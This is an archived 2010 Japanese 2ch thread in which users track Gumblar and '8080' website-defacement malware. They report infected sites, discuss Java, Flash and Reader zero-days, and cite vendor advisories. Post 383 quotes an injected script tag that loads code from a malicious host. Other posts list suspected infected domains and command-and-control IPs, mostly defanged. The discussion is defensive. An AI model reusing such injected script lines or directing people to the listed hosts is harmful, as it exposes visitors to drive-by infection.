【Gumblar/GENO】Web改竄ウイルス総合10【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合10【8080】 - 暇つぶし2ch368:/名無しさん[1-30] ◆.htmlint.U
10/10/08 19:58:56
>>367
乙です乙です。


> ●
>>366スレリンク(bicycle板:820-871番)>>353のようにすると過去ログがある場合もあります。
mimizun.com/log/2ch/bicycle/1274359715/820-871
(直リンするとみみずんさんの負担が大きいので>>366にしました。)

みみずんさんとこに無い場合もありますん。
2ch DAT落ちスレ ミラー変換機
URLリンク(mirrorhenkan.g.ribbon.to)
それでも無いことも。。。
●があればパーペキなんですけど。。。orz.....

369:名無しさん@お腹いっぱい。
10/10/08 20:14:52
>>368
みっけ
URLリンク(2chnull.info)

370:名無しさん@お腹いっぱい。
10/10/08 20:15:54
>>365
そのページとトップページを見たけど不正コードを確認できない

Googleも最後の検知日が9/20でもう時間が経っちゃてる
 ハッキングされてたのは間違いなんだろうけど
Google警告は管理者が対処完了報告しないと一定期間は消えない

371:名無しさん@お腹いっぱい。
10/10/09 17:09:46
エロ漫画検索してて遭遇したページなんだけど、
開くとメディアプレイヤーアドオンを要求。
で、そのコードが</html>の後にあるのがちょっと怪しい。

blogs●yahoo●co●jp/tmoebooks/2463230●html

どうなんだろ、ここ

372:名無しさん@お腹いっぱい。
10/10/09 17:29:45
判定スレじゃないよここは

373:名無しさん@お腹いっぱい。
10/10/09 17:52:15
こういう上から目線のカスは死ねばいいと思うわ
報告してくれてるだけマシだろ
少なくともおまえのレスよりぜんぜんマシ

374:名無しさん@お腹いっぱい。
10/10/09 17:59:44
上から目線すぎる…

375:名無しさん@お腹いっぱい。
10/10/09 18:38:17
自己弁護乙

376:名無しさん@お腹いっぱい。
10/10/09 18:40:07
報告して「くれてる」とかイミフ

377:名無しさん@お腹いっぱい。
10/10/09 18:47:33
何かわかんないときは質問スレ行くといいよ
ここはどっちかっていうと明らかなやつについて情報交換するスレ

378:名無しさん@お腹いっぱい。
10/10/09 20:13:31
上から目線の使い方が明らかに間違ってる

379:名無しさん@お腹いっぱい。
10/10/10 00:31:53
>>371 >>373
Yahoo!ブログは初めてか? 力抜けよ、どこも同じだから
yimg.jpはYahoo!のファイル置き場な

380:名無しさん@お腹いっぱい。
10/10/10 11:26:52
というかyimgはyahoo関係の画像とかだね

381:名無しさん@お腹いっぱい。
10/10/10 21:34:44
取扱注意

未対応&再改竄のため再掲載
サイバーギグス
www●movie-aa●com/

・JSUNPACK
3c77eaea56260e02a480ebf8e2bff22b39636c3b

絶賛放置&崩壊中
iiji●biz/
文字化けして読めませんw


382:/名無しさん[1-30] ◆.htmlint.U
10/10/11 00:35:26
>>381
おつですん。

上 二回目 無視かのぉ。。。
下 WHOISからメルってみました。

383:名無しさん@お腹いっぱい。
10/10/11 11:13:40
教えてください

body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/

はaguse.jpでチェックすると
<script type="text/javascript" src="URLリンク(pantscow)●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。

なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか?



384:名無しさん@お腹いっぱい。
10/10/11 11:49:31
わかりました。
sales-agency●jp/flv/swfobject●js
の末尾にありました

385:名無しさん@お腹いっぱい。
10/10/11 17:07:55
>>384
ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる

Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く 今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも

386:名無しさん@お腹いっぱい。
10/10/11 22:32:11
【VB】ウィルスバスター2011【クラウド】
スレリンク(sec板)

387:名無しさん@お腹いっぱい。
10/10/12 01:15:55
swfobject●jsが切れたので魚拓等
URLリンク(megalodon.jp)
URLリンク(jsunpack.jeek.org)
URLリンク(megalodon.jp)

388:名無しさん@お腹いっぱい。
10/10/12 09:55:02
caroll-amadea.bl0gger.eu/100531/p2/

389:名無しさん@お腹いっぱい。
10/10/12 18:28:56
1~6の頃の住人だったけど、もうペース落ちてきたね。

諸々の対策が効果を出してきたか、改ざんが分かりにくくなったか?

390:名無しさん@お腹いっぱい。
10/10/12 22:34:50
パスワードの強制変更がよかった
[止まらぬサイト改ざん(1) ISPがガンブラー対策~パスワードリセット敢行も]
URLリンク(www.so-net.ne.jp)
[ 止まらぬサイト改ざん(3):全ユーザー「FTPパスワード強制変更」の効果]
URLリンク(www.so-net.ne.jp)

sakuraは1月と比べて241→ 770と増えてるみたいだけどね
URLリンク(mimizun.com)


391:名無しさん@お腹いっぱい。
10/10/12 23:57:38
> ・aguse
> URLリンク(www.aguse.net)

糞仕様になったな

392:名無しさん@お腹いっぱい。
10/10/13 04:04:49
Janeのコマンドで見れないなと思ったら

393:名無しさん@お腹いっぱい。
10/10/16 07:21:22
最近めっきり話題無いなw
もういいのか?

394:名無しさん@お腹いっぱい。
10/10/16 09:44:27
改竄攻撃は攻撃者の気分次第だから何とも・・・
MicroAdみたいのはいつでも起こりうるから「もういい」なんてなしす

gumblar → 活動継続中、相変わらず日IPは弾かれる
8080 → 先月から活動が鈍い感じ? 今週は小康状態

395:名無しさん@お腹いっぱい。
10/10/16 23:07:46
今は日本のIPアドレスは弾くのか・・・
感染するような奴はいつもだいたい同じだから
新しい感染者を出すには別の国を短期集中的にやるのか?

396:名無しさん@お腹いっぱい。
10/10/20 01:42:55
[ゲームのニュース/ショップでの状況等のブロク] ファミコンプラザゲーム最新情報ページ
p://www■famicom-plaza■com/blog/

10月18日 AM5:00頃~AM11:00 にサイトに訪れた人にガンブラーの感染の疑い有りだそうです。
現在は上のページは復旧しているようです。

397:名無しさん@お腹いっぱい。
10/10/20 03:38:37
URLリンク(nes3)<)◎k2◎xrea◎com/comic/
URLリンク(click-no1)<)◎net/pet/?feed=rss2
URLリンク(www)<)◎citydusk◎com/

失敗例含むかも

398:名無しさん@お腹いっぱい。
10/10/20 11:18:01
古い型が多いな

399:名無しさん@お腹いっぱい。
10/10/20 21:41:25
[エフセキュアブログ : そのApacheのモジュールは本物ですか?]
URLリンク(blog.f-secure.jp)
.soファイル↓とやらを利用する亜種があるそうな

[動的共有オブジェクト (DSO) サポート - Apache HTTP サーバ]
URLリンク(httpd.apache.org)



400:名無しさん@お腹いっぱい。
10/10/21 23:32:41
>397
click-no1 はY知恵袋の質問文を引っ張ってきたものなので改ざんされてない
(ワードサラダなごみサイトだが)

401:名無しさん@お腹いっぱい。
10/10/22 00:00:38
Kasperskyのサイト改ざん ユーザーを偽サイトに転送
URLリンク(www.itmedia.co.jp)

402:名無しさん@お腹いっぱい。
10/10/22 10:35:56
カスペった

403:名無しさん@お腹いっぱい。
10/10/23 00:51:29
>>401
隠蔽とか、完璧にオワタwwww

404:名無しさん@お腹いっぱい。
10/10/23 18:29:19
ウィルス対策ソフトの会社が改ざんされ
それを隠蔽するも改ざんされてた事がバレる
信頼度0%になってしまった

405:名無しさん@お腹いっぱい。
10/10/23 19:10:32
ESETの仲間入りだなw

406:名無しさん@お腹いっぱい。
10/10/23 23:04:45
オパーイ詐称CMなんか流してる場合じゃねぇw

407:名無しさん@お腹いっぱい。
10/10/23 23:59:50
AKBという白アリ寄生虫なんかをCMに使うからだ

408:名無しさん@お腹いっぱい。
10/10/25 16:33:24
国内100社以上で感染被害を確認。”mstmp” ”lib.dll” のファイル名で拡散する不正プログラム
URLリンク(blog.trendmicro.co.jp)

URLリンク(www.rbbtoday.com)
URLリンク(journal.mycom.co.jp)

409:名無しさん@お腹いっぱい。
10/10/25 17:14:31
>>408の情報って、あんま無いね。

410:名無しさん@お腹いっぱい。
10/10/25 17:35:40
まぁ既にありふれた物になっちゃったgumblar/8080の亜種だしねぇ

411:名無しさん@お腹いっぱい。
10/10/25 17:43:22
ユーザーに対しては、「OS、アプリケーションを最新の状態にする」
「最新バージョンのセキュリティソフトを導入し、最新の状態に保つ」という2点を
改めて徹底するよう呼びかけている。
URLリンク(internet.watch.impress.co.jp)
Javaの脆弱性を悪用する不正プログラム「JAVA_AGENT.P」


412:名無しさん@お腹いっぱい。
10/10/25 18:28:01
JREが1.6.0_22ならmstmpはダウンロードすらされないらしいと聞いた。

413:名無しさん@お腹いっぱい。
10/10/25 19:30:28
>>408
これってマイクロアドのヤツか?
GIGAZINEでは'Security Tool'の他に
メディアプレーヤ、pdf、JARの脆弱性も利用されたみたいだし

「mstmp」系ウィルス補完計画
URLリンク(d.hatena.ne.jp)

414:名無しさん@お腹いっぱい。
10/10/26 02:03:36
ガンブラー流行ったのって去年の12月前後だったよね。
全然収束しなかったね。ガンブラーに関しては警察も動く的な記事を読んだ気もするけど・・

415:名無しさん@お腹いっぱい。
10/10/26 09:24:46
インターネット絶滅に都合がいいから放置してるんじゃね

416:名無しさん@お腹いっぱい。
10/10/26 09:51:42
GumblarとConfickerの戦い
URLリンク(www.youtube.com)

2010年上半期までは6:4とGumblar優勢だったはずが、
下半期に入りCon­fickerが逆転し、王者交代が行われた模様

だそうで(企業の話で一般家庭の話ではないみたい)

417:名無しさん@お腹いっぱい。
10/10/26 12:53:16
URLリンク(dougikai-jimin.jp)

418:名無しさん@お腹いっぱい。
10/10/26 13:19:26
このまま進化すると最終的に生活インフラにまで悪影響を及ぼしかねない勢いだ
実は産業にダメージを与えるための兵器なのかもしれんな

419:名無しさん@お腹いっぱい。
10/10/26 15:29:36
おれんところは、記憶力が落ちた祖母のところにあるPCの感染が不安だがな
ほんと、よくできたウィルスつくりやがって

420:名無しさん@お腹いっぱい。
10/10/26 22:31:59
新しいウィルスは、上記の対策でいまのとこOK?

421:名無しさん@お腹いっぱい。
10/10/26 23:03:56
どれのこといってんのかわからんけどだいたいおk
基本が大事なのです
各ソフトウェアのバージョンはちゃんと確認しなおしてね!

422:名無しさん@お腹いっぱい。
10/10/26 23:15:27
>>421
国内100社以上で感染被害を確認。?mstmp? ?lib.dll? のファイル名で拡散する不正プログラム
URLリンク(blog.trendmicro.co.jp)

URLリンク(www.rbbtoday.com)
URLリンク(journal.mycom.co.jp)
上記のウィルス
一応、JAVAは、最新版、導入しました

423:名無しさん@お腹いっぱい。
10/10/27 01:21:48
攻撃プログラムがJREのバージョンを見て、対象の脆弱性があるバージョンの場合は攻撃開始。
最新版を含む対象の脆弱性がないバージョンの場合は何もせずスルーするらしい。

424:名無しさん@お腹いっぱい。
10/10/27 13:18:16
>>420
古いJREが残る場合もあるようだから消しとくといいのかも。

425:名無しさん@お腹いっぱい。
10/10/27 19:21:58
>>413
> これってマイクロアドのヤツか?

マイクロアドじゃなくて、どこかのアクセス解析サービスらしい

アクセス解析サービスを使用した Web サイト経由での攻撃に関する注意喚起
URLリンク(www.jpcert.or.jp)

426:名無しさん@お腹いっぱい。
10/10/27 19:29:35
そのアクセス解析サービスはどこなんだろう?

本来は、そこをきちんと公開するべきじゃないのかな?

427:名無しさん@お腹いっぱい。
10/10/27 23:35:39
[「mstmp」系ウイルス(仮称) に感染しているか確認する方法 ? にわか鯖管の苦悩日記]
URLリンク(kikuz0u.x0.com)

428:名無しさん@お腹いっぱい。
10/10/28 00:15:55
>>426
既に分かってるんだけど、JPCERTが言わないからまだ野放しにされている。
指摘を受けたところは調査中らしいけど。

URLリンク(d.hatena.ne.jp)


429:名無しさん@お腹いっぱい。
10/10/28 08:25:28
知ってる人は匿名掲示板(笑)とかどこかに書いてもいいのにね
アクセス解析というとxreaは昔やられてたな

430:sage
10/10/28 14:28:35
知ってる人は知ってるからじゃね?

431:名無しさん@お腹いっぱい。
10/10/28 16:30:02
[36億スパム配信の凶悪ボットネットが解体 G DATA]
URLリンク(gdata.co.jp)

↓スクリプトでリダイレクトされるファイルが昨日も更新されてる
netdekase5●sakura●ne●jp
shimadaaqua●sakura●ne●jp
umeshin●sakura●ne●jp

432:名無しさん@お腹いっぱい。
10/10/28 16:32:45
いきなり襲ってきた「mstmp」ウィルスに大わらわ
URLリンク(itpro.nikkeibp.co.jp)

413,428に引用されているblogの人が、経緯について詳しく説明している

433:名無しさん@お腹いっぱい。
10/10/28 16:45:21
>>431
G DATAが言ってるのはGumblar 8080系の事で、Gumblar.xはまだ生きてるらしい

434:名無しさん@お腹いっぱい。
10/10/28 17:13:46
Gumblar.xも日本弾きは継続中らしいから
海外の串でも使わんと影響ないだろ

435:名無しさん@お腹いっぱい。
10/10/28 21:54:58
取扱注意
www●mypondstore●com/ThumbnailFrame●htm

<script>var XepaZerc='・・・・・

今騒いでるのはコイツだろ?

436:名無しさん@お腹いっぱい。
10/10/28 22:06:09
flashplayerもjavaもMSUPDATEから出来ればもっと被害者減りそうなもんだが

437:名無しさん@お腹いっぱい。
10/10/29 07:33:28
>>431
8080の方は更新止まってる
Gumblar.xが挿入してる「~php」の部分が絶賛更新中



438:名無しさん@お腹いっぱい。
10/10/29 08:44:32
Adobeの脆弱性が来たよん

Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
Release date: October 28, 2010

Flash Playerはby November 9, 2010
Adobe Reader and Acrobatはduring the week of November 15, 2010

URLリンク(www.adobe.com)

439:名無しさん@お腹いっぱい。
10/10/29 10:54:53
いっそのことFlashもクラウド化すりゃいいのに…
アップデートめんどい

440:名無しさん@お腹いっぱい。
10/10/29 11:29:58
>>439
イミフ


441:名無しさん@お腹いっぱい。
10/10/29 11:34:57
また勘違いクラウドかw

442:名無しさん@お腹いっぱい。
10/10/29 11:51:01
脳みそもクラウド化

443:名無しさん@お腹いっぱい。
10/10/29 12:01:05
“クラウド型”のウイルス対策ソフトってぶっちゃけどうなの?
スレリンク(news板)

444:名無しさん@お腹いっぱい。
10/10/29 12:18:22
クラウドw
セフィロスw

445:名無しさん@お腹いっぱい。
10/10/29 15:12:02
スレリンク(news板:32番)
catv?の人は去年から ここの感染URLを張り続けてますよね

そういう仕事なの?セキュリティ関連会社とか



446:名無しさん@お腹いっぱい。
10/10/29 15:22:57
まぁほとんど狙われないんだけどついでに
Shockwave Player 11.5.9.615
URLリンク(www.adobe.com)

447:名無しさん@お腹いっぱい。
10/10/29 21:41:03
URLリンク(hissi.org)
URLリンク(hissi.org)

スレ立て依頼してウイルスリンク張るのが
最近のスタイルなのかしら

448:名無しさん@お腹いっぱい。
10/10/30 00:26:53
>>438
■【ゼロデイ攻撃】Adobe Reader/Flash Playerの未修整の脆弱性狙うトロイの木馬
URLリンク(www.so-net.ne.jp)
>Adobe Reader/Acrobat 9.4およびそれ以前のバージョン
>Flash Player 10.1.85.3およびそれ以前のバージョン

■APSA10-05: Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat(セキュリティホールmemo)
URLリンク(www.st.ryukoku.ac.jp)

今年何回目のゼロデイだよw

449:名無しさん@お腹いっぱい。
10/10/30 00:46:28
ゼロデイの多さは人気の証(キリッ
なのにFlashを排除するAppleはおかしい

450:名無しさん@お腹いっぱい。
10/10/30 01:46:52
アドベはもう本気で死ねよ
やる気無いならさっさと辞めちまえ!

451:名無しさん@お腹いっぱい。
10/10/30 04:23:50
もうsilverlightでいいよ

452:名無しさん@お腹いっぱい。
10/10/30 10:46:20
>>442
激しくワロタw

453:名無しさん@お腹いっぱい。
10/10/30 10:49:01
ここまで執拗に adobe が狙われるのって、流石に何らかの意図を感じるね…

何の利害関係も無いスーパーハカーが、狙いやすいからやってるとかの問題じゃないような気がするんだけど…

454:名無しさん@お腹いっぱい。
10/10/30 11:07:43
狙われてるのは利用者が多い上に脆弱性があるからだよ

455:名無しさん@お腹いっぱい。
10/10/30 13:28:36
日数が経てばセキュリティソフトが対応するから、
ゼロデイ放置のほうが安全なような気がしてきたw

456:名無しさん@お腹いっぱい。
10/10/30 16:56:49
そんなわけないだろアホか

457:名無しさん@お腹いっぱい。
10/10/30 17:02:33
>>455
URLリンク(internet.watch.impress.co.jp)
>Flash Playerでは、Windows/Macintosh/Linux/Solaris版のバージョン10.1.85.3以前と、Android版の10.1.95.2以前が影響を受ける。

458:名無しさん@お腹いっぱい。
10/10/31 08:45:16
オレーシャ・ソロキナ豚が何たらこうやらwww

459:名無しさん@お腹いっぱい。
10/10/31 08:47:25
フジテレビで特集中

460:名無しさん@お腹いっぱい。
10/10/31 09:35:26
親が喧嘩ふっかけてきて、ろくに見れんかった

461:名無しさん@お腹いっぱい。
10/10/31 11:01:12
やっぱyoutubeやニコニコも狙われてるのかな?

462:名無しさん@お腹いっぱい。
10/10/31 16:42:46
Flash Playerの脆弱性狙いはFIREFOXの場合はStop AutoplayかFlash Blockで
flashを遮断すれば大丈夫なのでしょうか?

463:名無しさん@お腹いっぱい。
10/10/31 18:44:59
>>462
意味茄子

464:名無しさん@お腹いっぱい。
10/10/31 22:03:15
Flash Playerアンインスコおすすめ

465:名無しさん@お腹いっぱい。
10/11/01 01:46:18
>>462
Flash Playerは代替品が無いというのが痛いなw

466:名無しさん@お腹いっぱい。
10/11/01 10:46:53
さっさとHTML5(笑)標準化しろよ
まあそうなると98以前では動画とか見れなくなるが…

467:名無しさん@お腹いっぱい。
10/11/01 13:11:30
国内の多数サイトに影響、JRE悪用するウイルス感染について注意

株式会社ラックは10月29日、国内の多数のサイトで発生したガンブラー型攻撃による
ウイルス感染の実態について、特徴や手口の傾向が判明したとして、注意喚起を公表した。

ウイルスが接続を試みるIPアドレスは、以下のアドレス。
[64.27.25.223]、[64.27.25.224]、[88.80.7.152]、[85.17.209.3]、
[95.211.111.229]、[95.211.108.93]、[178.63.62.19]
URLリンク(internet.watch.impress.co.jp)

468:名無しさん@お腹いっぱい。
10/11/01 15:46:41

>今回確認された攻撃ではJava Runtime Environment(JRE)の脆弱性(CVE-2008-5353)を悪用することが確認された。
>ラックでは、多くの組織で社内システムやパッケージソフトに付属するそれぞれのJREを使用しているケースが見受けられ、
>そのためにJREのセキュリティ対策を適切に取れず、被害が相当数の企業に拡散していることが推測されるとしている。

CVE-2008ってことは2年前かと思ったら[CVE-2010-0094]もあるらしい

[アフィリエイトによる金銭取得が目的か!? -“mstmp””lib.dll”攻撃続報 | トレンドマイクロ セキュリティ ブログ]
URLリンク(blog.trendmicro.co.jp)


469:名無しさん@お腹いっぱい。
10/11/01 17:17:15
CVE-2010-0094でも3月のJava6Update19で修正されているんだから
半年も放置して感染したボンクラが救いようもないことにかわりはない

470:名無しさん@お腹いっぱい。
10/11/01 17:20:47
【GENOウイルス注意!】Java(JRE)の脆弱性を悪用するウイルス感染の特徴や手口が判明した模様
スレリンク(news板)

471:名無しさん@お腹いっぱい。
10/11/01 22:18:10
>>470
>>447
URLリンク(hissi.org)


472:名無しさん@お腹いっぱい。
10/11/02 15:25:37
JAVA入れてなかった

473:名無しさん@お腹いっぱい。
10/11/02 22:52:40
超CGキタ━━━(゚∀゚)━━━ !!!!!

474:名無しさん@お腹いっぱい。
10/11/02 22:53:28
誤爆したすまん

475:名無しさん@お腹いっぱい。
10/11/03 00:54:11
Gumblar8080攻撃のその後 ~Bredolabは本当に死んだのか~
URLリンク(www-950.ibm.com)

「8080は滅びぬ、何度でも蘇るさ」

476:名無しさん@お腹いっぱい。
10/11/03 03:36:46
skyhigh-read●com/

ブラウザとavastが反応
これはガチ?

477:名無しさん@お腹いっぱい。
10/11/03 04:00:29
>>476
>>475
■オランダ当局がBredolabボットネットを閉鎖~関連不明も8080系攻撃は停止中
URLリンク(www.so-net.ne.jp)

突っ込まれてるコード(URL)は現時点では無害。
・・だが、この先どうなるかは誰も知らん。

478:名無しさん@お腹いっぱい。
10/11/03 04:02:23
470のスレがDAT落ちしているようだが続きが気になる

479:名無しさん@お腹いっぱい。
10/11/03 04:11:15
>>477
把握

480:名無しさん@お腹いっぱい。
10/11/03 10:54:41
>>478
これのこと
genoウイルスとかなってるがぜんぜん関係ない
URLリンク(blogs.yahoo.co.jp)

481:名無しさん@お腹いっぱい。
10/11/03 17:37:18
>>480
ありがとう

482:名無しさん@お腹いっぱい。
10/11/03 21:29:08
>>480
>ぜんぜん関係ない
その記事には「ガンブラー型攻撃」って書いてあるし
Gumblarで盗まれたアカウントが使われたかもよ

多サイトにスクリプトを置く、価値の高いアカウントだから変化をつけたとか
マイクロアドのも似てるし

URLリンク(gw.aguse.jp.nyud.net)
>悪者は盗んだアカウント情報を“温存”している?


483:482
10/11/03 21:33:43
ごめん、「その記事」じゃなくて>>470の元ネタの記事だった

484:名無しさん@お腹いっぱい。
10/11/04 07:23:33
[【要注意】現在「ウェブ魚拓」がウィルスに感染している模様 : 馬鹿の野望byはなゆー]
URLリンク(kitamakura.seesaa.net)

485:名無しさん@お腹いっぱい。
10/11/04 08:25:53
まー マジであっちこっちに感染してるなー
ほんとに仮想PCでネットすること考えないとダメかこりゃ

486:名無しさん@お腹いっぱい。
10/11/04 08:33:26
おかしいと思ったらこのざまorz
魚拓踏みまくってるしw

487:名無しさん@お腹いっぱい。
10/11/04 11:33:54
>>484
ウィルスに感染しているサイトの魚拓を閲覧したとかじゃないの?

488:名無しさん@お腹いっぱい。
10/11/04 12:31:29
感染してたら
そのまま保存されるからな

489:名無しさん@お腹いっぱい。
10/11/04 13:30:32
魚拓を取ろうとするとエラーが出たり
表示できても時間を置くと見れなくなる

10月31日以降の魚拓が見れない異常事態
URLリンク(megalodon.jp)
URLリンク(megalodon.jp)

"Nine-Ball"ってGumblar型の攻撃だと思うけど
魚拓に対しての攻撃みたいだ


490:名無しさん@お腹いっぱい。
10/11/04 13:54:33
infoseekの無料版が終了する影響で負荷増加とかにしても期間長いしね

491:名無しさん@お腹いっぱい。
10/11/04 14:06:36
ガンブラー?ウェブ魚拓が感染      か
スレリンク(news板)

492:名無しさん@お腹いっぱい。
10/11/04 20:43:08
ウェブ魚拓スレより
91 名無しさん@お腹いっぱい。 [sage] 2010/11/04(木) 20:21:19 ID: Be:
株式会社アフィリティー ≫ Blog Archive ≫ ウェブ魚拓がウイルスに感染したという情報が流れている件につきまして
URLリンク(www.affility.co.jp)


493:名無しさん@お腹いっぱい。
10/11/04 20:44:11
>>492

リンク先より一部抜粋

>技術担当です。
>利用者の皆様にはご心配をおかけして申し訳ありません。

>ウイルス感染およびウェブサイトの改竄、侵入等について調査しましたが、確認できておりません。
>ウェブサーバの設定は書き換えられておらず、ウェブ公開フォルダの中にも不審なファイルは見つかりませんでした。

494:名無しさん@お腹いっぱい。
10/11/04 21:56:34
【無】の中の人へ
「ソコ」は.htaccessやられてるみたいだぬ。

>ちょめちょめ●ru/mymap/

referer:ちょめちょめ●ru/mymap/
→404 Not Found

referer:www.帝國.com/
→iframe イパーイ

危険なので以下略とす

495:494
10/11/04 22:01:46
追記
UA見てるから、IE6(笑)とかで凸すr(ry


496:/名無しさん[1-30] ◆.htmlint.U
10/11/04 22:07:06
(・3・) エェー
(・3・) リファラ当てるの苦手YO

.htaccessかお。。。

497:/名無しさん[1-30] ◆.htmlint.U
10/11/04 22:15:50
あっ誤爆。
【無】の中の人とは違いますお。

498:名無しさん@お腹いっぱい。
10/11/04 23:14:10 BE:2730903168-PLT(20000)
>>483
URLリンク(internet.watch.impress.co.jp)
これですか?

499:名無しさん@お腹いっぱい。
10/11/04 23:44:01
株式会社アフィリティー ≫ Blog Archive ≫ ウイルス正体判明
URLリンク(www.affility.co.jp)

一部抜粋
>2008年の1月にウイルスが含まれるウェブサイトの魚拓をとった人がいたようです。
~中略
>最近になって誰かがウイルスソフトを稼働させながら、この魚拓を閲覧して、
>サイト全体が感染している可能性があるとみなされ、その情報が共有されたのだと思われます。

これから感染したサイトの魚拓はとらない方が良さそうだね


500:名無しさん@お腹いっぱい。
10/11/04 23:54:56
ウイルスソフト……?

501:名無しさん@お腹いっぱい。
10/11/05 08:53:29
XP使うならJavaもFlashもPDFも無効にしろ、
JavaやFlashやPDF使うなら、Vista以降で保護モード使え
一般社員には管理者権限でログインさせんな

ってことでだいたい防御できるのにね

502:名無しさん@お腹いっぱい。
10/11/05 11:33:01
Flash 10.1.102.64になったよ

503:名無しさん@お腹いっぱい。
10/11/05 12:58:27
そのうちAndroidでも脆弱性つかれたりするんだろう
そうなったら被害が怖いな
ほんとうにFlashはこの先無くなったほうがいいかもね
ジョブズの気持ちも分からんでもない

504:名無しさん@お腹いっぱい。
10/11/05 13:54:02
ジョブズには脆弱性に関してどうこう言う資格がないだろ。
AppleもAdobeに負けず劣らず0-day状態のままほったらかす体質じゃないか。

505:名無しさん@お腹いっぱい。
10/11/05 14:17:17
>>502
トン

506:名無しさん@お腹いっぱい。
10/11/05 14:54:22
chromeだと10,1,103,19 になるんだけどまたすぐ更新が出るのかな

507:名無しさん@お腹いっぱい。
10/11/05 18:37:53
chromeについてくるFlashはgoogleが勝手に更新してくれたような

508:名無しさん@お腹いっぱい。
10/11/05 20:40:24
勝手に更新するんだけどIE他向けに出ているバージョンと違うので差分が気になる
同じバージョンがIE他でも出るのかどうか

509:名無しさん@お腹いっぱい。
10/11/05 21:21:06
たぶん出ない
Googleが好き勝手に改造してるんだろうし、
AppleにボコられてヘコんでるAdobeに
今の強大なGoogle帝国に意見する度胸は無い

510:名無しさん@お腹いっぱい。
10/11/06 00:56:38
>>509
■AdobeがFlashの深刻な脆弱性を解決、Readerに新たな問題発覚
URLリンク(www.itmedia.co.jp)
>これとは別にAdobeは同日、Readerの新たな問題がセキュリティメーリングリストに公表されたことを明らかにした。

このザマだからなw

511:名無しさん@お腹いっぱい。
10/11/06 12:44:38
Flash Player更新したらYouTubeの各ユーザーのチャンネルがきちんと見られない・・・

512:名無しさん@お腹いっぱい。
10/11/06 17:51:24
そういうスレじゃない

513:名無しさん@お腹いっぱい。
10/11/06 17:51:58
設定弄ってみれば?

514:名無しさん@お腹いっぱい。
10/11/06 22:55:43
ドメイン見て吹いた
inininininininin●in
comcomcomcomcomcom●com


515:名無しさん@お腹いっぱい。
10/11/07 08:14:50
なんかもう形振り構ってられなくなったのかな…

516:名無しさん@お腹いっぱい。
10/11/07 20:45:54
魚拓の過去分がゴッソリまるごと消えてる
URLリンク(megalodon.jp)

517:名無しさん@お腹いっぱい。
10/11/08 18:14:07
こうなった以上仕方ないだろ

518:名無しさん@お腹いっぱい。
10/11/09 21:44:43
n-yamashita●sakura●ne●jp
lovecosme●sakura●ne●jp/04-05
mirai-inc●net
prim-co●sakura●ne●jp
kajitakashi●sakura●ne●jp
moninet●sakura●ne●jp/ampleur-mania
e-cabinet●sakura●ne●jp/heb

77mail●sakura●ne●jp
barkays●sakura●ne●jp
ontheperch●sakura●ne●jp
sigoto-design●sakura●ne●jp

さくらに数ヶ月前に通報したけど反応なし
スパムメールの転送とか、リンク切れで危険度低

[2年連続で「.jp」は世界で最も安全な国別ドメインと評価 / 株式会社日本レジストリサービス(JPRS)]
URLリンク(jprs.co.jp)




519:名無しさん@お腹いっぱい。
10/11/11 14:14:10
万一ゼロデイなどで感染した場合
現在有効な感染の確認方法は無いでしょうか?

520:名無しさん@お腹いっぱい。
10/11/11 14:16:14
ほとんどない

だからみんな困ってる

521:名無しさん@お腹いっぱい。
10/11/11 15:24:22
見つからないようにこっそりやりたいのにそんな簡単に確認できる機構を作るわけないよね

522:名無しさん@お腹いっぱい。
10/11/11 16:52:29
初心者的な意見で意味無いかもしれないけど
駆除はともかく発見だけなら
bitdefenderとEmsisoftEmergencyKitのコマンドラインスキャンと
常駐アンチウイルスソフトによるCドライブのスキャンならいいのでは
対応してれば何とかなると思うけどだめかな

523:名無しさん@お腹いっぱい。
10/11/11 17:33:40
>>522
未知の脆弱性を見つけるような連中だから
主要なウイルス対策ソフトに発見されないように拡散前にチェックしているかと。

524:名無しさん@お腹いっぱい。
10/11/11 17:38:27
未知の脆弱性なんて突かれるようなことはほとんどないよ
ただ修正されてないだけで

525:名無しさん@お腹いっぱい。
10/11/11 17:41:01
脆弱性が発表されると
すぐにそれを付くマルウェアが出てくる
発表しない方が良いくらいにも思える

526:名無しさん@お腹いっぱい。
10/11/11 17:43:13
たいていのセキュリティソフトは新型に対しては後手に回ってしまっているのが実情
セキュリティソフトは必要最低限の備えであって過信していいもんじゃないよ
基本的にはできる範囲で他の対策も行わないと意味がない
といっても回避策のないゼロデイ攻撃が発生しちゃうと正直どうしようもないね
でもだいたい回避策あるけどね

527:名無しさん@お腹いっぱい。
10/11/11 17:48:06
こまめなシステムのバックアップ
それが一番じゃないかな

528:名無しさん@お腹いっぱい。
10/11/11 17:48:15
回避策がないとかあるとか何言ってんだよ
分かってねえくせに知ったかよしてくれ

529:名無しさん@お腹いっぱい。
10/11/11 18:04:29
この間のFlashには回避策はなかったな
現在ゼロデイ中のAdobe Reader(Acrobat)には回避策はあるが
結局は脆弱性の内容によるらからな

530:名無しさん@お腹いっぱい。
10/11/11 20:23:28
き・・脆弱性

531:名無しさん@お腹いっぱい。
10/11/12 18:13:18
>>510
すでに攻撃受けてるみたいだね
それらしい報告あがってたわ

532:名無しさん@お腹いっぱい。
10/11/12 19:44:15
Adobe Readerは初期設定でスクリプトやらマルチメディアやら無効にすればいいのにな。

533:名無しさん@お腹いっぱい。
10/11/12 20:34:56
flashplayerの方のゼロデイはブラウザの設定か他のソフトの設定で無効にしとけばいけるんじゃね?

534:名無しさん@お腹いっぱい。
10/11/14 09:37:12
[Internet Explorerのゼロデイ脆弱性を悪用するドライブ・バイ・ダウンロード攻撃を確認Tokyo SOC Report]
URLリンク(www-950.ibm.com)



535:名無しさん@お腹いっぱい。
10/11/15 16:25:39
踏み台にされるWebサイト~いわゆるGumblarの攻撃手法の分析調査~
(JPCERT コーディネーションセンター 研究・調査レポート)
URLリンク(www.jpcert.or.jp)

536:名無しさん@お腹いっぱい。
10/11/15 22:00:23
JSU●○●○●
fb742cde7f13f6aa9678cb7ab0ebac982a527d3d


537:名無しさん@お腹いっぱい。
